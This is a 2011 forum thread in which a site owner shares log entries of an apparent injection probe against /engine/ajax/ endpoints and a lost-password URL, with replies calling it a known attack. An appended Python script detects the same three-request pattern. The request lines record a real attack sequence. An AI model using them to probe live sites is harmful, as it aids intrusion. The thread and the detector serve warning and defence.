ajax code injection hacking attempt

Discussion in 'Javascript' started by me, Sep 7, 2011.

  1. me

    me Guest

    :)

    I came across this in my log files today, and thought I'd warn people who
    use Ajax. (Could be a well documented thing, I don't know where to check)

    77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    /engine/ajax/updates.php?wert=1&user_id=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
    HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
    SV1; .NET CLR 1.1.4322)"
    77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "POST
    /engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible;
    MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    /index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0
    (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

    Marc.
    me, Sep 7, 2011
    #1

  2. On Sep 6, 8:14 pm, "me" <> wrote:
    > :)
    >
    > I came across this in my log files today, and thought I'd warn people who
    > use Ajax. (Could be a well documented thing, I don't know where to check)
    >
    > 77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    > /engine/ajax/updates.php?wert=1&user_id=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
    > HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
    > SV1; .NET CLR 1.1.4322)"
    > 77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "POST
    > /engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible;
    > MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    > 77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    > /index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0
    > (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    >
    > Marc.



    I've decoded the above here: http://pastebin.com/1vwJEUw0
    Michael Haufe (TNO), Sep 7, 2011
    #2

  3. me

    me Guest

    "Michael Haufe (TNO)" <> wrote in message
    news:...
    > On Sep 6, 8:14 pm, "me" <> wrote:
    >> :)
    >>
    >> I came across this in my log files today, and thought I'd warn people who
    >> use Ajax. (Could be a well documented thing, I don't know where to check)
    >>
    >> 77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    >> /engine/ajax/updates.php?wert=1&user_id=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
    >> HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
    >> 5.1;
    >> SV1; .NET CLR 1.1.4322)"
    >> 77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "POST
    >> /engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible;
    >> MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    >> 77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    >> /index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0
    >> (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    >>
    >> Marc.

    >
    > I've decoded the above here: http://pastebin.com/1vwJEUw0


    Thanks; googling their server name reveals it's a known attack that's been
    around since 2009; more info at: http://pastebin.com/Qtk8jSfR

    Marc.
    me, Sep 7, 2011
    #3
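
A log check for the three-request pattern quoted in the first post, added here as an example and not part of the thread: it flags any client that requests both `/engine/ajax/` scripts and the lost-password URL within one logged second. The sample lines are constructed (documentation IP addresses, the `user_id` value replaced by a placeholder), and the function and label names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Apache "combined" log line: client ip, timestamp, request line, status.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(target):
    """Map a request target to one of the three probed endpoints, else None."""
    path, _, query = target.partition("?")
    if path == "/engine/ajax/updates.php":
        return "updates"
    if path == "/engine/ajax/keywords.php":
        return "keywords"
    if path == "/index.php" and parse_qs(query).get("do") == ["lostpassword"]:
        return "lostpassword"
    return None

def find_probe_bursts(lines, min_endpoints=3):
    """Return {(ip, timestamp): [labels]} for clients that hit at least
    min_endpoints distinct probed endpoints within the same logged second."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line (e.g. a wrapped fragment)
        label = classify(m["target"])
        if label:
            seen[(m["ip"], m["ts"])].add(label)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_endpoints}

# Constructed sample: one burst shaped like the post, plus one ordinary request.
UA = '"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"'
TS = "06/Sep/2011:09:07:58 +0200"
SAMPLE = [
    f'192.0.2.10 - - [{TS}] "GET /engine/ajax/updates.php?wert=1&user_id=PLACEHOLDER HTTP/1.1" 301 3844 {UA}',
    f'192.0.2.10 - - [{TS}] "POST /engine/ajax/keywords.php HTTP/1.1" 301 457 {UA}',
    f'192.0.2.10 - - [{TS}] "GET /index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 {UA}',
    f'198.51.100.7 - - [06/Sep/2011:09:08:01 +0200] "GET /index.php?do=lostpassword HTTP/1.1" 200 5120 {UA}',
    "SV1; .NET CLR 1.1.4322)",  # wrapped fragment, ignored by the parser
]

if __name__ == "__main__":
    for (ip, ts), labels in find_probe_bursts(SAMPLE).items():
        print(ip, ts, labels)
```

Log lines that have been wrapped, as in the post, need rejoining into one line per request before they will parse.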